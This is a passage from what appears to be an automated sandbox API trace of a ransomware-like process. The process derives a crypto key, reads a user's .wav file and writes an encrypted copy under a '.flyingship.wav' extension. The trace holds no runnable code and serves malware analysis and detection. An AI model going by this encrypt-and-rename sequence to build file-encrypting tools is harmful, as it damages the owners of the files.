wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.039] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.039] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.039] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0188.039] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.039] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.039] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.039] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0188.039] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.039] CryptHashData (hHash=0x90ae18, pbData=0x8ded08, dwDataLen=0x19, dwFlags=0x1) returned 1 [0188.039] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.040] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.040] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.040] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.040] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0188.040] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0188.040] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0188.040] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.040] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0188.040] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.040] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.040] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.040] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.040] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.040] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.040] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0188.040] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.040] CryptDestroyHash (hHash=0x90ae18) returned 1 [0188.040] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.040] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.040] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.041] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.041] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.041] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\v6hgg6br4l.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0188.042] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.042] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0188.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0188.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0188.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0188.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0188.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0188.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0188.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0188.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0188.042] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0188.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0188.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0188.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0188.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0188.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0188.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0188.043] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0188.043] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0188.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0188.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0188.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0188.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0188.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0188.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0188.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0188.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0188.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0188.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0188.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0188.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0188.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0188.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0188.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0188.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0188.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0188.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0188.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0188.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0188.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0188.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0188.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0188.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0188.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0188.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0188.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0188.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9058 [0188.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0188.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0188.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0188.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0188.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0188.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0188.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0188.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0188.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0188.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0188.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0188.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0188.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0188.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0188.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0188.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0188.045] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol")) returned 0x10 [0188.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0188.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0188.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0188.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0188.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0188.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0188.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0188.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0188.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0188.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0188.046] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.flyingship.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\v6hgg6br4l.flyingship.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0188.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0188.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0188.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0188.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0188.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0188.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0188.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0188.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0188.056] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0188.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0188.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0188.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0188.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0188.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0188.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0188.057] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0188.057] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0188.057] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0188.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0188.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0188.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0188.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0188.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0188.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0188.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0188.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0188.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0188.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0188.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0188.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0188.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0188.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0188.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0188.058] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0188.058] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0xa7a0, lpOverlapped=0x0) returned 1 [0188.061] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0188.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0188.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0188.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0188.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0188.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa7a0) returned 0xbea018 [0188.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0188.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0188.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0188.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0188.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0188.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0188.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa7a0) returned 0xbf47c0 [0188.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0188.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0188.062] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0188.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0188.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0188.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0188.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0188.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa7a0) returned 0xbea018 [0188.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0188.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0188.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0188.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0188.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0188.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0188.063] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0188.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0188.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0188.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0188.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0188.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0188.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0188.063] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0188.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0188.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0188.064] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0188.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0188.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0188.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26c8 [0188.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0188.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0188.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0188.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0188.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa7a0) returned 0xbea018 [0188.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0188.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27a8 [0188.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0188.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0188.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0188.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27d8 [0188.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0188.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0188.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0188.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2618 [0188.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 